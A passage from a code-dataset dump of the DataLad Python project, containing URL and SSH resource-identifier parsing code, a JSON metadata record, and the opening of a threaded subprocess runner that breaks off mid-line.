#\n # If any field is specified, URL is not considered 'False', i.e.\n # non-existing, although may be we could/shout omit having only\n # scheme or port specified since it doesn't point to any useful\n # location\n #\n\n def __bool__(self):\n fields = self._fields\n return any(fields.values())\n\n #\n # Helpers to deal with internal structures and conversions\n #\n\n def _set_from_fields(self, **fields):\n unknown_fields = set(fields).difference(self._FIELDS)\n if unknown_fields:\n raise ValueError(\"Do not know about %s. Known fields for %s are: %s\"\n % (unknown_fields, self.__class__, self._FIELDS))\n\n # encode dicts for query or fragment into\n for f in {'query', 'fragment'}:\n v = fields.get(f)\n if isinstance(v, dict):\n\n ev = urlencode(map_items(ensure_bytes, v))\n # / is reserved char within query\n if f == 'fragment' and '%2F' not in str(v):\n # but seems to be ok'ish within the fragment which is\n # the last element of URI and anyways used only by the\n # client (i.e. by us here if used to compose the URL)\n # so let's return / back for clarity if there were no\n # awkward %2F to startswith\n ev = ev.replace('%2F', '/')\n fields[f] = ev\n\n self._fields.update(fields)\n\n #\n # Quick comparators\n #\n\n def __eq__(self, other):\n if not isinstance(other, RI):\n other = RI(other)\n return isinstance(other, self.__class__) and dict(other._fields) == dict(self._fields)\n\n def __ne__(self, other):\n return not (self == other)\n\n def __getattribute__(self, item):\n if item.startswith('_') or item not in self._FIELDS:\n return super(RI, self).__getattribute__(item)\n else:\n return self._fields[item]\n\n def __setattr__(self, item, value):\n if item.startswith('_') or item not in self._FIELDS:\n super(RI, self).__setattr__(item, value)\n else:\n self._fields[item] = value\n self._str = None\n\n\nclass URL(RI):\n \"\"\"Universal resource locator\n\n Although largely decorating urlparse.ParseResult, it\n - doesn't mandate providing all parts of the URL\n - doesn't require netloc but rather asks for separate username, password, and hostname\n \"\"\"\n\n _FIELDS = RI._FIELDS + (\n 'scheme',\n 'netloc',\n 'username',\n 'password',\n 'hostname', 'port',\n 'query',\n 'fragment',\n )\n\n # Only interpreted on Windows. If set to `True`, UNC-names encoded in\n # file-URLs, e.g. \"file://server/share/path\", would be considered local\n # and mapped onto \"\\\\server\\share\\path\". If set to `False`, UNC-names\n # encoded in file-URLs would not be considered local and cannot be resolved\n # to a local path.\n support_unc = False\n\n def as_str(self):\n \"\"\"Render URL as a string\"\"\"\n return urlunparse(self.to_pr())\n\n @classmethod\n def _str_to_fields(cls, url_str):\n fields = URL._pr_to_fields(urlparse(url_str))\n fields['path'] = urlunquote(fields['path'])\n return fields\n\n def to_pr(self):\n \"\"\"Convert URL to urlparse.ParseResults namedtuple\"\"\"\n return self._fields_to_pr(self._fields)\n\n @classmethod\n def _fields_to_pr(cls, fields):\n \"\"\"Recompose back fields dict to ParseResult\"\"\"\n netloc = fields['username'] or ''\n if fields['password']:\n netloc += ':' + fields['password']\n if netloc:\n netloc += '@'\n netloc += fields['hostname']\n if fields['port']:\n if fields['hostname'].count(':') >= 2:\n # ipv6 -- need to enclose in []\n netloc = '[%s]:%s' % (netloc, fields['port'])\n else:\n netloc += ':%s' % fields['port']\n\n pr_fields = {\n f: fields[f]\n for f in cls._FIELDS\n if f not in ('hostname', 'password', 'username', 'port')\n }\n pr_fields['netloc'] = netloc\n pr_fields['params'] = ''\n # We need to quote the path\n pr_fields['path'] = urlquote(pr_fields['path'])\n # TODO: figure out what to do with query/fragment... one step at a time\n return ParseResult(**pr_fields)\n\n @classmethod\n def _pr_to_fields(cls, pr, guessing=False):\n \"\"\"ParseResult is a tuple so immutable, which complicates adjusting it\n\n This function converts ParseResult into dict\"\"\"\n if pr.params:\n (lgr.debug if guessing else lgr.warning)(\n \"ParseResults contains params %s, which will be ignored\",\n repr(pr.params),)\n\n hostname_port = pr.netloc.split('@')[-1]\n is_ipv6 = hostname_port.count(':') >= 2\n # can't use just pr._asdict since we care to ask those properties\n # such as .port , .hostname etc\n # Forcing '' instead of None since those properties (.hostname), .password,\n # .username return None if not available and we decided to uniformize\n if is_ipv6:\n rem = re.match(r'\\[(?P<hostname>.*)\\]:(?P<port>\\d+)', hostname_port)\n if rem:\n hostname, port = rem.groups()\n port = int(port)\n else:\n hostname, port = hostname_port, ''\n\n def _getattr(pr, f):\n \"\"\"Helper for custom handling in case of ipv6 addresses which blows\n stock ParseResults logic\"\"\"\n if f == 'port':\n # for now not supported at all, so\n return port\n elif f == 'hostname':\n return hostname\n else:\n return getattr(pr, f)\n else:\n _getattr = getattr\n\n return {f: (_getattr(pr, f) or '') for f in cls._FIELDS}\n\n #\n # Access helpers\n #\n\n def _parse_qs(self, s, auto_delist=True):\n \"\"\"Helper around parse_qs to strip unneeded 'list'ing etc and return a dict of key=values\"\"\"\n if not s:\n return {}\n out = map_items(ensure_unicode, dict(parse_qsl(s, 1)))\n if not auto_delist:\n return out\n for k in out:\n v = out[k]\n if isinstance(v, list) and len(v) == 1:\n v = v[0]\n out[k] = None if v == '' else v\n return out\n\n @property\n def query_dict(self):\n return self._parse_qs(self.query)\n\n @property\n def fragment_dict(self):\n return self._parse_qs(self.fragment)\n\n def _windows_local_path(self,\n support_unc: bool = False\n ) -> str:\n \"\"\"Convert the URL to a local path on windows, supports UNC and git-annex\"\"\"\n\n # RFC1738 and RFC3986 both forbid unescaped backslash characters in\n # URLs, and therefore also in the path-component of file:-URLs. We\n # assume here that any backslash present in a file-URL is a relict of a\n # verbatim copy of a Windows-style path.\n unified_path = self.path.replace('\\\\', '/')\n local_path = url2pathname(unified_path)\n\n # We support UNC notation, and the \"special\" git-annex drive encoding\n # scheme, i.e. netloc is the drive letter plus a colon.\n # NB, this if clause will not evaluate to True, because our caller\n # filters out net locations with\n if self.netloc:\n if re.match('^[a-zA-Z]:$', self.netloc):\n # This is the git-annex case, i.e. drive spec in netloc\n return self.netloc + local_path\n if support_unc:\n return '\\\\\\\\' + self.netloc + local_path\n raise ValueError(\"Unsupported file: URL: {self}\")\n return local_path\n\n @property\n def localpath(self):\n if self.scheme != 'file':\n raise ValueError(\n \"Non 'file://' URL cannot be resolved to a local path\")\n\n # If there is a hostname, we might want to convert to UNC, unless the\n # hostname has the form of a 'Windows drive letter' on windows\n hostname = self.hostname\n if not (hostname in (None, '', 'localhost', '::1')\n or hostname.startswith('127.')\n or re.match('^[a-zA-Z]:$', self.netloc)):\n if on_windows:\n return self._windows_local_path(support_unc=self.support_unc)\n raise ValueError(\"file:// URL does not point to 'localhost'\")\n\n if on_windows:\n return self._windows_local_path(support_unc=True)\n\n return url2pathname(self.path)\n\n\nclass PathRI(RI):\n \"\"\"RI pointing to a (local) file/directory\"\"\"\n def as_str(self):\n return self.path\n\n @classmethod\n def _str_to_fields(cls, url_str):\n # str() to be compatible with pathlib objects\n return dict(path=str(url_str))\n\n @property\n def localpath(self):\n return str(Path(self.path))\n\n @property\n def posixpath(self):\n if is_windows_path(self.path):\n win_split = win_splitdrive(self.path)\n return \"/\" + win_split[0][0] + win_split[1].replace('\\\\', '/')\n else:\n return self.path\n\n\nclass RegexBasedURLMixin(object):\n \"\"\"Base class for URLs which we could simple parse using regular expressions\"\"\"\n\n _REGEX = None\n\n # not used ATM but possible ;)\n # @classmethod\n # def is_str_matches(cls, url_str):\n # return bool(cls._REGEX.match(url_str))\n\n @classmethod\n def _str_to_fields(cls, url_str):\n re_match = cls._REGEX.match(url_str)\n if not re_match:\n # TODO: custom error?\n raise ValueError(\n \"Cannot handle URL '%s': categorized as %r, but does not match syntax.%s\"\n % (url_str,\n cls,\n \" Did you intent to use '///'?\" if url_str.startswith('//') else '')\n )\n fields = cls._get_blank_fields()\n fields.update({k: v for k, v in re_match.groupdict().items() if v})\n cls._normalize_fields(fields)\n return fields\n\n @classmethod\n def _normalize_fields(self, fields):\n \"\"\"Helper to be ran if any of the fields need to be normalized after parsing\"\"\"\n pass\n\n\nclass SSHRI(RI, RegexBasedURLMixin):\n \"\"\"RI pointing to a remote location reachable via SSH\"\"\"\n\n _FIELDS = RI._FIELDS + (\n 'username',\n 'hostname',\n 'port',\n )\n\n _REGEX = re.compile(r'((?P<username>\\S*)@)?(?P<hostname>[^#/\\\\:]+)(\\:(?P<path>.*))?$')\n\n @classmethod\n def _normalize_fields(cls, fields):\n if fields['path'] and fields['path'].startswith('//'):\n # Let's normalize for now to avoid multiple leading slashes\n fields['path'] = '/' + fields['path'].lstrip('/')\n # escape path so we have direct representation of the path to work with\n fields['path'] = unescape_ssh_path(fields['path'])\n\n def as_str(self, escape=False):\n fields = self.fields # copy so we could escape symbols\n url_fmt = '{hostname}'\n if fields['username']:\n url_fmt = \"{username}@\" + url_fmt\n if fields['path']:\n url_fmt += ':{path}'\n if escape:\n fields['path'] = escape_ssh_path(fields['path'])\n return url_fmt.format(**fields)\n\n # TODO:\n # we can \"support\" localhost:path as localpaths\n\n\nclass DataLadRI(RI, RegexBasedURLMixin):\n \"\"\"RI pointing to datasets within default DataLad super-dataset\"\"\"\n\n _FIELDS = RI._FIELDS + (\n 'remote',\n )\n\n # For now or forever we don't deal with any fragments or other special stuff\n _REGEX = re.compile(r'//(?P<remote>[^\\s/]*)/(?P<path>.*)$')\n\n # do they need to be normalized??? losing track ...\n\n def as_str(self):\n return \"//{remote}/{path}\".format(**self._fields)\n\n def as_git_url(self):\n \"\"\"Dereference /// into original URLs which could be used by git for cloning\n\n Returns\n -------\n str\n URL string to reference the DataLadRI from its /// form\n \"\"\"\n if self.remote:\n raise NotImplementedError(\"not supported ATM to reference additional remotes\")\n return \"{}{}\".format(consts.DATASETS_TOPURL, urlquote(self.path))\n\n\nclass GitTransportRI(RI, RegexBasedURLMixin):\n \"\"\"RI for some other RI with git transport prefix\"\"\"\n\n # TODO: check how crticial to \"inherit\" RI._FIELDS asking to provide path\n _FIELDS = RI._FIELDS + (\n 'transport',\n 'RI',\n )\n\n # Due to poor design, `ri` argument already present in various\n # places intermixed with **kwargs treatment. So we will use RI\n # here instead of ri.\n _REGEX = re.compile(r'(?P<transport>[A-Za-z0-9][A-Za-z0-9+.-]*)::(?P<RI>.*)$')\n\n def as_str(self):\n return '{self.transport}::{self.RI}'.format(self=self)\n\n\ndef _split_colon(s, maxsplit=1):\n \"\"\"Split on unescaped colon\"\"\"\n return re.compile(r'(?<!\\\\):').split(s, maxsplit=maxsplit)\n\n# \\ should be first to deal with\n_SSH_ESCAPED_CHARACTERS = '\\\\#&;`|*?~<>^()[]{}$\\'\" '\n\n\n# TODO: RF using re.sub\ndef escape_ssh_path(path):\n \"\"\"Escape all special characters present in the path\"\"\"\n for c in _SSH_ESCAPED_CHARACTERS:\n if c in path:\n path = path.replace(c, '\\\\' + c)\n return path\n\n\ndef unescape_ssh_path(path):\n \"\"\"Un-escape all special characters present in the path\"\"\"\n for c in _SSH_ESCAPED_CHARACTERS[::-1]:\n if c in path:\n path = path.replace('\\\\' + c, c)\n return path\n\n\ndef parse_url_opts(url):\n \"\"\"Given a string with url-style query, split into content before # and options as dict\"\"\"\n url = URL(url)\n # we need to filter out query and fragment to get the base url\n fields = url.fields\n fields.pop('query')\n fields.pop('fragment')\n opts = url.query_dict\n return str(URL(**fields)), opts\n\n\n# TODO: should we just define URL.good_for_git or smth like that? ;)\n# although git also understands regular paths\ndef is_url(ri):\n \"\"\"Returns whether argument is a resource identifier what datalad should treat as a URL\n\n This includes ssh \"urls\" which git understands.\n\n Parameters\n ----------\n ri : str or RI\n The resource identifier (as a string or RI) to \"analyze\"\n \"\"\"\n if not isinstance(ri, RI):\n try:\n ri = RI(ri)\n except: # MIH: MemoryError?\n return False\n return isinstance(ri, (URL, SSHRI))\n\n\n# TODO: RF to remove duplication\ndef is_datalad_compat_ri(ri):\n \"\"\"Returns whether argument is a resource identifier what datalad should treat as a URL\n\n including its own DataLadRI\n \"\"\"\n if not isinstance(ri, RI):\n try:\n ri = RI(ri)\n except: # MIH: MemoryError?\n return False\n return isinstance(ri, (URL, SSHRI, DataLadRI))\n\n\n# TODO: better name? additionally may be move to SSHRI.is_valid() or sth.\ndef is_ssh(ri):\n \"\"\"helper to determine, whether `ri` requires an SSH connection\n\n Parameters\n ----------\n ri: str or RI\n\n Returns\n -------\n bool\n \"\"\"\n\n # not exactly fitting the doc, but we actually can deal not necessarily with\n # string or RI only, but with everything RI itself can deal with:\n _ri = RI(ri) if not isinstance(ri, RI) else ri\n\n return isinstance(_ri, SSHRI) \\\n or (isinstance(_ri, URL) and _ri.scheme == 'ssh')\n\n\ndef get_local_file_url(fname: str,\n compatibility: str = 'git-annex',\n allow_relative_path: bool = True\n ) -> str:\n \"\"\"Return OS specific URL pointing to a local file\n\n Parameters\n ----------\n fname : string\n Filename. If not absolute, abspath is used\n compatibility : str, optional\n This parameter is only interpreted on Windows systems. If set to\n anything else than 'git', the anchor, e.g. `C:` of `fname` will be put\n into the `file-auth` part, i.e. network location, defined in RFC 8089.\n This option is mainly used to support git-annex specific encoding of\n Windows paths.\n allow_relative_path: bool, optional\n Allow `fname` to be a relative path. The path will be converted to an\n absolute path, by using the current directory as path prefix.\n \"\"\"\n url_path = local_path2url_path(fname, allow_relative_path=allow_relative_path)\n if on_windows and compatibility != \"git\":\n # Work around the way in which git-annex interprets file URLs on\n # Windows. This code path will put the path anchor, e.g. `C:` of `fname`\n # into the network location component of the resulting URL.\n return \"file:/\" + url_path\n\n result = \"file://\" + url_path\n return result\n\n\ndef get_url_cache_filename(url, name=None):\n \"\"\"Return a filename where to cache online doc from a url\"\"\"\n if not name:\n name = \"misc\"\n cache_dir = opj(cfg.obtain('datalad.locations.cache'), name)\n doc_fname = opj(\n cache_dir,\n '{}-{}.p{}'.format(\n urlsplit(url).netloc,\n md5(url.encode('utf-8')).hexdigest(),\n pickle.HIGHEST_PROTOCOL)\n )\n return doc_fname\n\n\ndef get_cached_url_content(url, name=None, fetcher=None, maxage=None):\n \"\"\"Loader of a document from a url, which caches loaded instance on disk\n\n Doesn't do anything smart about http headers etc which could provide\n information for cache/proxy servers for how long to retain etc\n\n TODO: theoretically it is not network specific at all -- and just a memoize\n pattern, but may be some time we would make it treat headers etc correctly.\n And ATM would support any URL we support via providers/downloaders\n\n Parameters\n ----------\n fetcher: callable, optional\n Function to call with url if needed to be refetched\n maxage: float, optional\n Age in days to retain valid for. <0 - would retain forever. If None -\n would consult the config, 0 - would force to reload\n \"\"\"\n doc_fname = get_url_cache_filename(url, name)\n if maxage is None:\n maxage = float(cfg.get('datalad.locations.cache-maxage'))\n\n doc = None\n if os.path.exists(doc_fname) and maxage != 0:\n\n fage = (time.time() - os.stat(doc_fname).st_mtime)/(24. * 3600)\n if maxage < 0 or fage < maxage:\n try:\n lgr.debug(\"use cached request result to '%s' from %s\", url, doc_fname)\n doc = pickle.load(open(doc_fname, 'rb'))\n except Exception as e: # it is OK to ignore any error and fall back on the true source\n lgr.warning(\n \"cannot load cache from '%s', fall back to download: %s\",\n doc_fname, CapturedException(e))\n\n if doc is None:\n if fetcher is None:\n from datalad.downloaders.providers import Providers\n providers = Providers.from_config_files()\n fetcher = providers.fetch\n\n doc = fetcher(url)\n ensure_dir(dirname(doc_fname))\n # use pickle to store the entire request result dict\n pickle.dump(doc, open(doc_fname, 'wb'))\n lgr.debug(\"stored result of request to '%s' in %s\", url, doc_fname)\n return doc\n\n\ndef download_url(url, dest=None, overwrite=False):\n \"\"\"Download a file from a URL\n\n Supports and honors any DataLad \"downloader/provider\" configuration.\n\n Parameters\n ----------\n url: str\n Source URL to download from.\n dest: Path-like or None\n Destination file name (file must not exist), or name of a target\n directory (must exists, and filename must be derivable from `url`).\n If None, the downloaded content will be returned as a string.\n overwrite: bool\n Force overwriting an existing destination file.\n\n Returns\n -------\n str\n Path of the downloaded file, or URL content if `dest` is None.\n\n Raises\n ------\n DownloadError\n If `dest` already exists and is a file, or if `dest` is a directory\n and no filename could be determined from `url`, or if no file was\n found at the given `url`.\n \"\"\"\n from datalad.downloaders.providers import Providers\n providers = Providers.from_config_files()\n if dest:\n return providers.download(url, path=str(dest), overwrite=overwrite)\n else:\n return providers.fetch(url)\n\n\ndef local_path2url_path(local_path: str,\n allow_relative_path: bool = False\n ) -> str:\n \"\"\"Convert a local path into an URL path component\"\"\"\n local_path = Path(local_path)\n if not local_path.is_absolute() and allow_relative_path:\n local_path = local_path.absolute()\n\n url = urlparse(Path(local_path).as_uri())\n if url.netloc:\n raise ValueError(\n f\"cannot convert remote path to an URL path: {local_path}\")\n return url.path\n\n\ndef url_path2local_path(url_path: str | PurePosixPath) -> str | Path:\n if isinstance(url_path, PurePosixPath):\n return_path = True\n url_path = str(url_path)\n else:\n return_path = False\n\n if not url_path or not url_path.startswith(\"/\"):\n # We expect a 'path-absolute' as defined in RFC 3986, therefore the\n # path must begin with a slash.\n raise ValueError(\n f\"url path does not start with '/': {url_path}, and is therefore \"\n f\"not an absolute-path as defined in RFC 8089\")\n\n if url_path.startswith(\"//\"):\n # We expect a 'path-absolute' as defined in RFC 3986, therefore the\n # first segment must not be empty, i.e. the path must not start with\n # two or more slashes.\n raise ValueError(\n f\"url path has empty first segment: {url_path}, and is therefore \"\n f\"not an absolute-path as defined in RFC 8089\")\n\n return (\n Path(url2pathname(url_path))\n if return_path\n else url2pathname(url_path)\n )\n\n\ndef quote_path(path: str, safe: str = \"/\") -> str:\n \"\"\"quote the path component of a URL, takes OS specifics into account\n\n On Windows-like system a path-prefix consisting of a slash, a single letter,\n a colon, and a slash, i.e. '/c:/Windows', the colon will not be quoted.\n All characters after the colon will be quoted by `urllib.parse.quote`.\n\n On Unix-like systems the complete path component will be quoted by\n 'urllib.parse.quote'.\n\n Parameters\n ----------\n path: str\n The path that should be quoted\n\n safe: str (default '/')\n Characters that should not be quoted, passed\n on to the save-parameter of `urllib.parse.quote`.\n\n Returns\n -------\n str\n The quoted path component\n \"\"\"\n if on_windows:\n if re.match(\"^/[a-zA-Z]:/\", path):\n return path[:3] + quote(path[3:], safe=safe)\n return quote(path, safe=safe)\n\n\nlgr.log(5, \"Done importing support.network\")\n" }, { "alpha_fraction": 0.5889691114425659, "alphanum_fraction": 0.5904660820960999, "avg_line_length": 38.040260314941406, "blob_id": "e9941f27dd938964263559289c1d6a7b453f0b2a", "content_id": "8340ab1df9c27eb0d920a61560ff8251009b6bb1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30061, "license_type": "permissive", "max_line_length": 88, "num_lines": 770, "path": "/datalad/runner/nonasyncrunner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\nThread based subprocess execution with stdout and stderr passed to protocol objects\n\"\"\"\n\nfrom __future__ import annotations\n\nimport enum\nimport logging\nimport subprocess\nimport threading\nimport time\nfrom collections import deque\nfrom collections.abc import Generator\nfrom queue import (\n Empty,\n Queue,\n)\nfrom subprocess import Popen\nfrom typing import (\n IO,\n Any,\n Optional,\n)\n\nfrom datalad.utils import on_windows\n\nfrom .exception import CommandError\nfrom .protocol import (\n GeneratorMixIn,\n WitlessProtocol,\n)\nfrom .runnerthreads import (\n IOState,\n ReadThread,\n WaitThread,\n WriteThread,\n _try_close,\n)\n\nlgr = logging.getLogger(\"datalad.runner.nonasyncrunner\")\n\nSTDIN_FILENO = 0\nSTDOUT_FILENO = 1\nSTDERR_FILENO = 2\n\n\n# A helper to type-safe retrieval of a Popen-fileno, if data exchange was\n# requested.\ndef _get_fileno(active: bool,\n popen_std_x: Optional[IO]\n ) -> Optional[int]:\n if active:\n assert popen_std_x is not None\n return popen_std_x.fileno()\n return None\n\n\nclass _ResultGenerator(Generator):\n \"\"\"\n Generator returned by run_command if the protocol class\n is a subclass of `datalad.runner.protocol.GeneratorMixIn`\n \"\"\"\n class GeneratorState(enum.Enum):\n initialized = 0\n process_running = 1\n process_exited = 2\n connection_lost = 3\n waiting_for_process = 4\n exhausted = 5\n\n def __init__(self,\n runner: ThreadedRunner,\n result_queue: deque\n ) -> None:\n\n super().__init__()\n self.runner = runner\n self.result_queue = result_queue\n self.return_code = None\n self.state = self.GeneratorState.process_running\n self.all_closed = False\n self.send_lock = threading.Lock()\n\n def _check_result(self):\n self.runner._check_result()\n\n def send(self, message):\n with self.send_lock:\n return self._locked_send(message)\n\n def _locked_send(self, message):\n if self.state == self.GeneratorState.initialized:\n if message is not None:\n raise RuntimeError(\n f\"sent non-None message {message!r} to initialized generator \"\n )\n self.state = self.GeneratorState.process_running\n\n runner = self.runner\n\n if self.state == self.GeneratorState.process_running:\n # If we have elements in the result queue, return one\n while len(self.result_queue) == 0 and runner.should_continue():\n runner.process_queue()\n if len(self.result_queue) > 0:\n return self.result_queue.popleft()\n\n # The process must have exited\n # Let the protocol prepare the result. This has to be done after\n # the loop was left to ensure that all data from stdout and stderr\n # is processed.\n runner.protocol.process_exited()\n self.return_code = runner.process.poll()\n self._check_result()\n self.state = self.GeneratorState.process_exited\n\n if self.state == self.GeneratorState.process_exited:\n # The protocol might have added result in the\n # _prepare_result()- or in the process_exited()-\n # callback. Those are returned here.\n if len(self.result_queue) > 0:\n return self.result_queue.popleft()\n runner.ensure_stdin_stdout_stderr_closed()\n runner.protocol.connection_lost(None) # TODO: check for exceptions\n runner.wait_for_threads()\n runner._set_process_exited()\n self.state = self.GeneratorState.connection_lost\n\n if self.state == self.GeneratorState.connection_lost:\n # Get all results that were enqueued in\n # state: GeneratorState.process_exited.\n if len(self.result_queue) > 0:\n return self.result_queue.popleft()\n self.state = self.GeneratorState.exhausted\n runner.owning_thread = None\n with runner.generator_condition:\n runner.generator = None\n runner.generator_condition.notify()\n\n if self.state == self.GeneratorState.exhausted:\n raise StopIteration(self.return_code)\n\n raise RuntimeError(f\"unknown state: {self.state}\")\n\n def throw(self, exception_type, value=None, trace_back=None):\n return Generator.throw(self, exception_type, value, trace_back)\n\n\nclass ThreadedRunner:\n \"\"\"\n A class the contains a naive implementation for concurrent sub-process\n execution. It uses `subprocess.Popen` and threads to read from stdout and\n stderr of the subprocess, and to write to stdin of the subprocess.\n\n All read data and timeouts are passed to a protocol instance, which can\n create the final result.\n \"\"\"\n # Interval in seconds after which we check that a subprocess\n # is still running.\n timeout_resolution = 0.2\n\n def __init__(self,\n cmd: str | list,\n protocol_class: type[WitlessProtocol],\n stdin: int | IO | bytes | Queue[Optional[bytes]] | None,\n protocol_kwargs: Optional[dict] = None,\n timeout: Optional[float] = None,\n exception_on_error: bool = True,\n **popen_kwargs\n ):\n \"\"\"\n Parameters\n ----------\n cmd : list or str\n Command to be executed, passed to `subprocess.Popen`. If cmd\n is a str, `subprocess.Popen will be called with `shell=True`.\n\n protocol : WitlessProtocol class or subclass which will be\n instantiated for managing communication with the subprocess.\n\n If the protocol is a subclass of\n `datalad.runner.protocol.GeneratorMixIn`, this function will\n return a `Generator` which yields whatever the protocol callback\n fed into `GeneratorMixIn.send_result()`.\n\n If the protocol is not a subclass of\n `datalad.runner.protocol.GeneratorMixIn`, the function will return\n the result created by the protocol method `_generate_result`.\n\n stdin : file-like, bytes, Queue, or None\n If stdin is a file-like, it will be directly used as stdin for the\n subprocess. The caller is responsible for writing to it and closing\n it. If stdin is a bytes, it will be fed to stdin of the subprocess.\n If all data is written, stdin will be closed.\n If stdin is a Queue, all elements (bytes) put into the Queue will\n be passed to stdin until None is read from the queue. If None is\n read, stdin of the subprocess is closed.\n If stdin is None, nothing will be sent to stdin of the subprocess.\n More precisely, `subprocess.Popen` will be called with `stdin=None`.\n\n protocol_kwargs : dict, optional\n Passed to the protocol class constructor.\n\n timeout : float, optional\n If a non-`None` timeout is specified, the `timeout`-method of\n the protocol will be called if:\n\n - stdin-write, stdout-read, or stderr-read time out. In this case\n the file descriptor will be given as argument to the\n timeout-method. If the timeout-method return `True`, the file\n descriptor will be closed.\n\n - process.wait() timeout: if waiting for process completion after\n stdin, stderr, and stdout takes longer than `timeout` seconds,\n the timeout-method will be called with the argument `None`. If\n it returns `True`, the process will be terminated.\n\n exception_on_error : bool, optional\n This argument is only interpreted if the protocol is a subclass\n of `GeneratorMixIn`. If it is `True` (default), a\n `CommandErrorException` is raised by the generator if the\n sub process exited with a return code not equal to zero. If the\n parameter is `False`, no exception is raised. In both cases the\n return code can be read from the attribute `return_code` of\n the generator.\n\n popen_kwargs : dict, optional\n Passed to `subprocess.Popen`, will typically be parameters\n supported by `subprocess.Popen`. Note that `bufsize`, `stdin`,\n `stdout`, `stderr`, and `shell` will be overwritten internally.\n \"\"\"\n\n self.cmd = cmd\n self.protocol_class = protocol_class\n self.stdin = stdin\n self.protocol_kwargs = protocol_kwargs or {}\n self.timeout = timeout\n self.exception_on_error = exception_on_error\n self.popen_kwargs = popen_kwargs\n\n self.catch_stdout = self.protocol_class.proc_out\n self.catch_stderr = self.protocol_class.proc_err\n\n self.write_stdin: bool = False\n self.stdin_queue: Optional[Queue] = None\n self.process_stdin_fileno: Optional[int] = None\n self.process_stdout_fileno: Optional[int] = None\n self.process_stderr_fileno: Optional[int] = None\n self.stderr_enqueueing_thread: Optional[ReadThread] = None\n self.stdout_enqueueing_thread: Optional[ReadThread] = None\n self.stdin_enqueueing_thread: Optional[WriteThread] = None\n self.process_waiting_thread: Optional[WaitThread] = None\n\n self.process_running: bool = False\n self.output_queue: Queue = Queue()\n self.process_removed: bool = False\n self.generator: Optional[_ResultGenerator] = None\n self.process: Optional[Popen[Any]] = None\n self.return_code: Optional[int] = None\n\n self.last_touched: dict[Optional[int], float] = dict()\n self.active_file_numbers: set[Optional[int]] = set()\n self.stall_check_interval = 10\n\n self.initialization_lock = threading.Lock()\n self.generator_condition = threading.Condition()\n self.owning_thread: Optional[int] = None\n\n # Pure declarations\n self.protocol: WitlessProtocol\n self.fileno_mapping: dict[Optional[int], int]\n self.fileno_to_file: dict[Optional[int], Optional[IO]]\n self.file_to_fileno: dict[IO, int]\n self.result: dict\n\n def _check_result(self):\n if self.exception_on_error is True:\n if self.return_code not in (0, None):\n protocol = self.protocol\n decoded_output = {\n source: protocol.fd_infos[fileno][1].decode(protocol.encoding)\n for source, fileno in (\n (\"stdout\", protocol.stdout_fileno),\n (\"stderr\", protocol.stderr_fileno))\n if protocol.fd_infos[fileno][1] is not None\n }\n raise CommandError(\n cmd=self.cmd,\n code=self.return_code,\n stdout=decoded_output.get(\"stdout\", None),\n stderr=decoded_output.get(\"stderr\", None)\n )\n\n def run(self) -> dict | _ResultGenerator:\n \"\"\"\n Run the command as specified in __init__.\n\n This method is not re-entrant. Furthermore, if the protocol is a\n subclass of `GeneratorMixIn`, and the generator has not been\n exhausted, i.e. it has not raised `StopIteration`, this method should\n not be called again. If it is called again before the generator is\n exhausted, a `RuntimeError` is raised. In the non-generator case, a\n second caller will be suspended until the first caller has returned.\n\n Returns\n -------\n Any\n If the protocol is not a subclass of `GeneratorMixIn`, the\n result of protocol._prepare_result will be returned.\n\n Generator\n If the protocol is a subclass of `GeneratorMixIn`, a Generator\n will be returned. This allows to use this method in constructs\n like:\n\n for protocol_output in runner.run():\n ...\n\n Where the iterator yields whatever protocol.pipe_data_received\n sends into the generator.\n If all output was yielded and the process has terminated, the\n generator will raise StopIteration(return_code), where\n return_code is the return code of the process. The return code\n of the process will also be stored in the \"return_code\"-attribute\n of the runner. So you could write:\n\n gen = runner.run()\n for file_descriptor, data in gen:\n ...\n\n # get the return code of the process\n result = gen.return_code\n \"\"\"\n with self.initialization_lock:\n return self._locked_run()\n\n def _locked_run(self) -> dict | _ResultGenerator:\n with self.generator_condition:\n if self.generator is not None:\n if self.owning_thread == threading.get_ident():\n raise RuntimeError(\n \"ThreadedRunner.run() was re-entered by already owning \"\n f\"thread {threading.get_ident()}. The execution is \"\n f\"still owned by thread {self.owning_thread}\"\n )\n self.generator_condition.wait()\n assert self.generator is None\n\n if isinstance(self.stdin, (int, IO, type(None))):\n # We will not write anything to stdin. If the caller passed a\n # file-like he can write to it from a different thread.\n self.write_stdin = False\n\n elif isinstance(self.stdin, bytes):\n # Establish a queue to write to the process and\n # enqueue the input that is already provided.\n self.write_stdin = True\n self.stdin_queue = Queue()\n self.stdin_queue.put(self.stdin)\n self.stdin_queue.put(None)\n\n elif isinstance(self.stdin, Queue):\n # Establish a queue to write to the process.\n self.write_stdin = True\n self.stdin_queue = self.stdin\n\n else:\n # We do not recognize the input class will and just pass is through\n # to Popen(). We assume that the caller handles any writing if\n # desired.\n self.write_stdin = False\n\n self.protocol = self.protocol_class(**self.protocol_kwargs)\n\n # The following command is generated internally by datalad\n # and trusted. Security check is therefore skipped.\n kwargs = {\n **self.popen_kwargs,\n **dict(\n bufsize=0,\n stdin=subprocess.PIPE if self.write_stdin else self.stdin,\n stdout=subprocess.PIPE if self.catch_stdout else None,\n stderr=subprocess.PIPE if self.catch_stderr else None,\n shell=True if isinstance(self.cmd, str) else False # nosec\n )\n }\n\n if self.process is not None:\n raise RuntimeError(f\"Process already running {self.process.pid}\")\n\n self.return_code = None\n try:\n # The following command is generated internally by datalad\n # and trusted. Security check is therefore skipped.\n self.process = Popen(self.cmd, **kwargs) # nosec\n\n except OSError as e:\n if not on_windows and \"argument list too long\" in str(e).lower():\n lgr.error(\n \"Caught exception suggesting too large stack size limits. \"\n \"Hint: use 'ulimit -s' command to see current limit and \"\n \"e.g. 'ulimit -s 8192' to reduce it to avoid this \"\n \"exception. See \"\n \"https://github.com/datalad/datalad/issues/6106 for more \"\n \"information.\"\n )\n raise\n\n self.process_running = True\n self.active_file_numbers.add(None)\n\n self.process_stdin_fileno = _get_fileno(self.write_stdin, self.process.stdin)\n self.process_stdout_fileno = 